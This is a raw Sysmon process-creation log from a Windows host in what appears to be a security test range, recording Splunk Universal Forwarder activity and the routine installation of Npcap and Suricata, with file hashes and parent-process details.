AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A2-6078-4805-00000000AE01}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 154100x800000000000000021383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.024{A8622C2F-43A2-6078-4805-00000000AE01}3828C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021374Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.668{A8622C2F-43A1-6078-4705-00000000AE01}6344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A1-6078-4605-00000000AE01}6480C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 
154100x800000000000000021366Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.662{A8622C2F-43A1-6078-4605-00000000AE01}6480C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.350{A8622C2F-43A1-6078-4505-00000000AE01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.045{A8622C2F-43A1-6078-4405-00000000AE01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.033{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-43A1-6078-4205-00000000AE01}6384C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 154100x800000000000000021331Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:09.027{A8622C2F-43A1-6078-4205-00000000AE01}6384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021321Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.689{A8622C2F-43A0-6078-4105-00000000AE01}2248C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A0-6078-4005-00000000AE01}6552C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 154100x800000000000000021313Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.683{A8622C2F-43A0-6078-4005-00000000AE01}6552C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A0-6078-3F05-00000000AE01}6596C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 154100x800000000000000021305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.678{A8622C2F-43A0-6078-3F05-00000000AE01}6596C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A0-6078-3805-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x800000000000000021296Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.374{A8622C2F-43A0-6078-3E05-00000000AE01}7108C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A0-6078-3D05-00000000AE01}4184C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x800000000000000021288Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.368{A8622C2F-43A0-6078-3D05-00000000AE01}4184C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A0-6078-3C05-00000000AE01}716C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list 
general --no-log 154100x800000000000000021280Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.362{A8622C2F-43A0-6078-3C05-00000000AE01}716C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A0-6078-3805-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x800000000000000021271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.057{A8622C2F-43A0-6078-3B05-00000000AE01}6544C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A0-6078-3A05-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 154100x800000000000000021263Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.050{A8622C2F-43A0-6078-3A05-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A0-6078-3905-00000000AE01}5188C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 154100x800000000000000021255Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.045{A8622C2F-43A0-6078-3905-00000000AE01}5188C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A0-6078-3805-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x800000000000000021247Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.033{A8622C2F-43A0-6078-3805-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-43A0-6078-3705-00000000AE01}2708C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 
154100x800000000000000021239Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:08.027{A8622C2F-43A0-6078-3705-00000000AE01}2708C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:07.988{A8622C2F-439F-6078-3505-00000000AE01}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-439F-6078-3305-00000000AE01}6308C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 154100x800000000000000021219Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:07.961{A8622C2F-439F-6078-3305-00000000AE01}6308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021212Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:07.264{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000018839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:45.793{A8622C2F-4389-6078-2D05-00000000AE01}7132C:\Windows\SysWOW64\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeSCHTASKS.EXE /Create /F /RU SYSTEM /SC ONSTART /TN npcapwatchdog /TR "'C:\Program Files\Npcap\CheckStatus.bat'" /NPC:\Program Files\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4B95F8D55CD14BD3D38BF24A521D3577,SHA256=CAA9AF113C1682AD8A6644342B37D96AA544F1AF712D446BD29EF9F12BA30CA0,IMPHASH=BEF0464378C9F8D07E6BF56FFE61864B{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 
154100x800000000000000018760Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:41.327{A8622C2F-4385-6078-2C05-00000000AE01}4496C:\Windows\System32\drvinst.exe10.0.14393.0 (rs1_release.160715-1616)Driver Installation ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationDrvInst.EXEDrvInst.exe "4" "0" "C:\Users\ADMINI~1\AppData\Local\Temp\{c089f090-c098-3a4a-b7d0-27e680df9e7f}\NPCAP.inf" "9" "405306be3" "0000000000000B0C" "WinSta0\Default" "0000000000000B20" "208" "C:\Program Files\Npcap"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=188CE3916E9FD3D123F38F01F8F8B93C,SHA256=C196086017725E8724DAB1DFDFABA9F4B7CFACD47A885BCC81984F8BC78D9F75,IMPHASH=35385286B2F23FB279C3D2868A503474{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000018745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:41.156{A8622C2F-4385-6078-2A05-00000000AE01}6492C:\Program Files\Npcap\NPFInstall.exe1.20A LWF & WFP driver installation toolNpcapInsecure.Com LLC.NPFInstall.exe"C:\Program Files\Npcap\NPFInstall.exe" -n -iC:\Windows\system32\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69A87CA4D06087A36AF2C26CFAC3E705,SHA256=94DBF270AE479A2AE2F61F7B2C573BC7D6CB787F264B9178654A3AF2A66244CA,IMPHASH=596D8DB0DE29AE6D4AACEFE8943C3DD2{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018730Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:41.047{A8622C2F-4385-6078-2805-00000000AE01}4528C:\Program Files\Npcap\NPFInstall.exe1.20A LWF & WFP driver installation toolNpcapInsecure.Com LLC.NPFInstall.exe"C:\Program Files\Npcap\NPFInstall.exe" -n 
-iwC:\Windows\system32\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69A87CA4D06087A36AF2C26CFAC3E705,SHA256=94DBF270AE479A2AE2F61F7B2C573BC7D6CB787F264B9178654A3AF2A66244CA,IMPHASH=596D8DB0DE29AE6D4AACEFE8943C3DD2{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018717Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:40.694{A8622C2F-4384-6078-2605-00000000AE01}5048C:\Windows\System32\pnputil.exe10.0.14393.2758 (rs1_release_1.190104-1904)Microsoft PnP Utility - Tool to add, delete, export, and enumerate driver packages.Microsoft® Windows® Operating SystemMicrosoft Corporationpnputil.exepnputil.exe -eC:\Windows\system32\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0523245FA9B7DAFF739C1C42C1143976,SHA256=D11EA7611A503979C30531EB7F8E5C6F75C874B09B590F8F6B12DA84F6272FA2,IMPHASH=502259F6F2B32E4AAAB4CD630C18D3DD{A8622C2F-4384-6078-2405-00000000AE01}6296C:\Program Files\Npcap\NPFInstall.exe"C:\Program Files\Npcap\NPFInstall.exe" -n -c 154100x800000000000000018704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:40.607{A8622C2F-4384-6078-2405-00000000AE01}6296C:\Program Files\Npcap\NPFInstall.exe1.20A LWF & WFP driver installation toolNpcapInsecure.Com LLC.NPFInstall.exe"C:\Program Files\Npcap\NPFInstall.exe" -n -cC:\Windows\system32\Npcap\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69A87CA4D06087A36AF2C26CFAC3E705,SHA256=94DBF270AE479A2AE2F61F7B2C573BC7D6CB787F264B9178654A3AF2A66244CA,IMPHASH=596D8DB0DE29AE6D4AACEFE8943C3DD2{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018603Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:39.662{A8622C2F-4383-6078-2205-00000000AE01}3368C:\Users\ADMINI~1\AppData\Local\Temp\nsnE683.tmp\NPFInstall.exe1.20A LWF & WFP driver 
installation toolNpcapInsecure.Com LLC.NPFInstall.exe"C:\Users\ADMINI~1\AppData\Local\Temp\nsnE683.tmp\NPFInstall.exe" -n -check_dllC:\Users\ADMINI~1\AppData\Local\Temp\nsnE683.tmp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69A87CA4D06087A36AF2C26CFAC3E705,SHA256=94DBF270AE479A2AE2F61F7B2C573BC7D6CB787F264B9178654A3AF2A66244CA,IMPHASH=596D8DB0DE29AE6D4AACEFE8943C3DD2{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe"C:\temp\npcap.exe" 154100x800000000000000018563Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:36.021{A8622C2F-4380-6078-2105-00000000AE01}4776C:\Temp\npcap.exe1.20Npcap 1.20 installerNpcap--"C:\temp\npcap.exe" C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BBBF876AA41436386AB2F930CD699BC9,SHA256=EF8113E595694A14D35BD31043ED6EA73AC5793CF53985AE950F4E65B406E363,IMPHASH=572D74F42CB043F2E4F09743EC7480B5{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000018440Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:27.817{A8622C2F-4377-6078-1F05-00000000AE01}5628C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000018425Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:27.663{A8622C2F-4377-6078-1E05-00000000AE01}3540C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® 
installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exe"C:\Windows\system32\msiexec.exe" /i c:\temp\Suricata.msi /l*v c:\temp\suricataInstallLog.txt /qnC:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-4359-6078-1605-00000000AE01}2596C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\suricata.ps1" 154100x800000000000000018409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:26.342{A8622C2F-4376-6078-1D05-00000000AE01}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018398Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:24.749{A8622C2F-4374-6078-1C05-00000000AE01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
